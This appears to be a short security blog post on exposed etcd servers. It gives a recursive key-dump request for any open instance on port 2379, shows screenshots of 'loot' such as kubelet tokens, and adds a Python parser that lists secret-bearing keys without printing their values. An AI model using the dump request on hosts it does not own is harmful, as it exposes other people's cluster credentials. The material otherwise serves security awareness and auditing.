<span style="background-color: white; text-size-adjust: auto;"><span style="font-family: inherit;"><a href="https://elweb.co/the-security-footgun-in-etcd/" target="_blank">https://elweb.co/the-security-footgun-in-etcd/</a></span></span><br />
<span style="background-color: white; text-size-adjust: auto;"><a href="https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/" target="_blank">https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/</a></span><br />
<span style="background-color: white; text-size-adjust: auto;"><br /></span>
<span style="background-color: white; text-size-adjust: auto;">The second link talks extensively about the types of info they found when they hit all the Shodan endpoints for 2379 and did some analysis on the results.</span><br />
<span style="background-color: #f8f8f8; font-family: "helvetica" , "arial" , sans-serif; font-size: 14px; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;">If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:</span></span><br />
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; white-space: nowrap;"><span style="font-family: "courier new" , "courier" , monospace;">GET http://ip_address:2379/v2/keys/?recursive=true</span></span><br />
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;">Example Loot - </span></span><br />
<br />
<span style="background-color: white; white-space: nowrap;">Usually it's boring stuff like this:</span><br />
<span style="background-color: white; white-space: nowrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW2jG4div9KO_lmuaygTwCi6ykcAoB-NiZZ6y7yLmhOwjMVz8NN-O3VKE78RttO93cO-hX7RcxFe2qroALJ15h0TvZDb7qDbL_qhDi9Fbd9vn5U2XNGubhDXJDhCvDLGCOD3jlxOX40u0/s1600/etcd2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="304" data-original-width="1600" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW2jG4div9KO_lmuaygTwCi6ykcAoB-NiZZ6y7yLmhOwjMVz8NN-O3VKE78RttO93cO-hX7RcxFe2qroALJ15h0TvZDb7qDbL_qhDi9Fbd9vn5U2XNGubhDXJDhCvDLGCOD3jlxOX40u0/s640/etcd2.png" width="640" /></a></div>
<span style="background-color: white; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;">But occasionally you'll get more interesting things like:</span><br />
<span style="background-color: white; white-space: nowrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPOuKOTRhwmEQYZwVYXtDtkaqYqkAzEFmqKZzFiRFPa8IZJJNNtMuPAvPLVTxIvUHW-wLqMtucIbn7RIuMlt22aT-4GI9qUgdvTFBJMK2AhYcqSlXuk4309NyHIarQqZcxfSLM01TNNdI/s1600/etcd3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPOuKOTRhwmEQYZwVYXtDtkaqYqkAzEFmqKZzFiRFPa8IZJJNNtMuPAvPLVTxIvUHW-wLqMtucIbn7RIuMlt22aT-4GI9qUgdvTFBJMK2AhYcqSlXuk4309NyHIarQqZcxfSLM01TNNdI/s640/etcd3.png" width="640" /></a></div>
<span style="background-color: white; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;">or more fun things like kubelet tokens:</span><br />
<span style="background-color: white; white-space: nowrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsDZfs0wDDqUMejegIcpu6OYM58gSWEtPvCbitBUPUlY-c-2i-xtIZO3ezeHMTm4EiNqInypDpPOA96gLQlGPbzcd8MG1kBMsNMFQ0OqUYKy7ee9-6nD_oiDGhSv0JYPDatf_3WlOGQk/s1600/etcd1+copy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="745" data-original-width="1600" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsDZfs0wDDqUMejegIcpu6OYM58gSWEtPvCbitBUPUlY-c-2i-xtIZO3ezeHMTm4EiNqInypDpPOA96gLQlGPbzcd8MG1kBMsNMFQ0OqUYKy7ee9-6nD_oiDGhSv0JYPDatf_3WlOGQk/s640/etcd1+copy.png" width="640" /></a></div>
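As an added example (not code from the post), a parser for the response to the recursive GET above: it flattens the nested etcd v2 node tree and separates keys under /registry/secrets/ (where Kubernetes stores Secret objects, including service-account tokens) from everything else, reporting only value lengths so an exposure inventory of an open etcd can be written up without copying credentials around. The response JSON is constructed to the v2 API shape and the token in it is fake.

```python
"""Inventory what an open etcd v2 keyspace exposes, without echoing values.

Added example, not from the original post. It parses the JSON returned by
GET /v2/keys/?recursive=true, flattens the nested "node"/"nodes" tree into
leaf keys and reports which ones live under the Kubernetes Secret registry
path. The sample response below is constructed; the token inside is fake.
"""
from __future__ import annotations

import json
from typing import Iterator

# Constructed sample in the shape of an etcd v2 recursive GET response.
SAMPLE_ETCD_RESPONSE = json.dumps({
    "action": "get",
    "node": {
        "dir": True,
        "nodes": [
            {"key": "/registry", "dir": True, "nodes": [
                {"key": "/registry/namespaces", "dir": True, "nodes": [
                    {"key": "/registry/namespaces/kube-system",
                     "value": "{\"kind\":\"Namespace\"}"},
                ]},
                {"key": "/registry/secrets", "dir": True, "nodes": [
                    {"key": "/registry/secrets/kube-system/default-token-abcde",
                     # fake token: base64("FAKE-TOKEN")
                     "value": "{\"kind\":\"Secret\",\"data\":{\"token\":\"RkFLRS1UT0tFTg==\"}}"},
                ]},
                {"key": "/registry/pods", "dir": True, "nodes": [
                    {"key": "/registry/pods/default/web-1", "value": "{\"kind\":\"Pod\"}"},
                ]},
            ]},
            {"key": "/coreos.com", "dir": True, "nodes": [
                {"key": "/coreos.com/network/config",
                 "value": "{\"Network\":\"10.1.0.0/16\"}"},
            ]},
        ],
    },
})

# etcd key prefixes under which Kubernetes keeps credential-bearing objects.
SENSITIVE_PREFIXES = ("/registry/secrets/",)


def flatten(node: dict) -> Iterator[tuple[str, str]]:
    """Walk the v2 node tree depth-first, yielding (key, value) for leaf keys.

    Directory nodes carry "dir": true and a "nodes" list (absent when the
    directory is empty); the root node for "/" has no "key" of its own.
    """
    if node.get("dir"):
        for child in node.get("nodes", []):
            yield from flatten(child)
    elif "key" in node:
        yield node["key"], node.get("value", "")


def inventory(response_json: str) -> dict[str, list[dict]]:
    """Bucket leaf keys into 'sensitive' and 'other', keeping only value lengths.

    The secret material itself is deliberately not retained, so the result
    can be pasted into a finding without leaking the credentials.
    """
    root = json.loads(response_json).get("node", {})
    result: dict[str, list[dict]] = {"sensitive": [], "other": []}
    for key, value in flatten(root):
        bucket = "sensitive" if key.startswith(SENSITIVE_PREFIXES) else "other"
        result[bucket].append({"key": key, "value_len": len(value)})
    return result


if __name__ == "__main__":
    inv = inventory(SAMPLE_ETCD_RESPONSE)
    print(f"{len(inv['sensitive'])} secret-bearing keys, {len(inv['other'])} other keys")
    for entry in inv["sensitive"]:
        print(f"  {entry['key']} ({entry['value_len']} bytes, value withheld)")
```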
<span style="background-color: white; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;"><br /></span>Unknownnoreply@blogger.com0